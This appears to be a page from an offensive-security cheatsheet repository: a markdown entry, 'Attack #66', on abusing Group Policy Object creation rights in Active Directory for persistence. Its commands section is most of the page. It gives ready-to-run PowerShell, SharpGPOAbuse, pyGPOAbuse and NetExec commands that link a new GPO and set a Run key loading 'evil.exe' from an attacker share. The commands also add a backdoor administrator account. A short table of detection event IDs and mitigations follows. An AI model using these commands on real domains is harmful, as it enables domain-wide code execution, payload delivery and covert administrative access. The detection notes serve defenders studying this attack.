daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-66-malicious-gpo-creation.md (3597B)


      1 ---
      2 title: "Attack #66 β€” Malicious GPO Creation"
      3 description: "An attacker with GPO creation rights (or who compromises a GPO-managing account) can create or modify Group Policy Objects to execute malicious scripts…"
      4 category: active-directory
      5 subcategory: "Persistence"
      6 tags: ["active-directory"]
      7 tools: ["NetExec", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Eight/🟀 Attack #66 β€” Malicious GPO Creation.md"
     11 ---
     12 # 🟀 Attack #66 β€” Malicious GPO Creation
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 An attacker with **GPO creation rights** (or who compromises a GPO-managing account) can create or modify Group Policy Objects to execute malicious scripts, create scheduled tasks, or deploy software across the domain. GPOs can target specific OUs β€” allowing precise payload delivery to selected groups of machines or users.
     19 
     20 ***
     21 
     22 ## βš™οΈ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **GPO creation/edit rights** | Typically Group Policy Creator Owners or DA |
     27 | **GPO linked to target OU** | Must link GPO for it to apply |
     28 
     29 ***
     30 
     31 ## πŸ’» Full Commands
     32 
     33 ```powershell
     34 # ── Create new GPO ────────────────────────────────────────────────────────────
     35 New-GPO -Name "IT Maintenance" | New-GPLink -Target "OU=Servers,DC=corp,DC=local"
     36 
     37 # ── Add startup script to GPO ─────────────────────────────────────────────────
     38 Set-GPPrefRegistryValue -Name "IT Maintenance" -Action Create \
     39   -Context Computer -Key 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' \
     40   -ValueName 'Maintenance' -Type String -Value '\\ATTACKER\share\evil.exe'
     41 
     42 # ── SharpGPOAbuse (automated GPO abuse) ───────────────────────────────────────
     43 .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" \
     44   --Author "NT AUTHORITY\SYSTEM" --Command "cmd.exe" \
     45   --Arguments "/c net user hacker P@ss! /add && net localgroup Administrators hacker /add" \
     46   --GPOName "IT Maintenance"
     47 
     48 # ── pyGPOAbuse (Linux) ────────────────────────────────────────────────────────
     49 python3 pygpoabuse.py corp.local/Administrator:'Password1' \
     50   -gpo-id "12345678-ABCD-1234-ABCD-123456789012" \
     51   -command "net user hacker P@ss! /add" -f
     52 ```
     53 
     54 ```bash
     55 # ── NetExec β€” execute via GPO ─────────────────────────────────────────────────
     56 nxc smb DC01.corp.local -u Administrator -p 'Password1' -M gpo_abuse
     57 ```
     58 
     59 ***
     60 
     61 ## πŸ›‘οΈ Detection β€” Event IDs
     62 
     63 | Event ID | Source | What to Look For |
     64 |---|---|---|
     65 | **5136** | Security Log (DC) | GroupPolicyContainer object modified |
     66 | **4688** | Security Log | Script execution from GPO startup/logon path |
     67 | **5145** | Security Log | SYSVOL script access |
     68 
     69 ***
     70 
     71 ## πŸ”— Attack Chain Context
     72 
     73 ```
     74 [Malicious GPO] ──→ Domain-wide code execution via Group Policy
     75          β”‚
     76          β”œβ”€β”€β†’ πŸ’» Deploy malware, create admin users, disable AV across the domain
     77          β”œβ”€β”€β†’ πŸ”— GPO applies on reboot/logon β€” patient persistence
     78          └──→ πŸ’€ Defeated by: restrict GPO creation rights, audit GPO changes
     79 ```
     80 
     81 ***
     82 
     83 > βœ… **Attack #66 β€” Malicious GPO Creation complete.**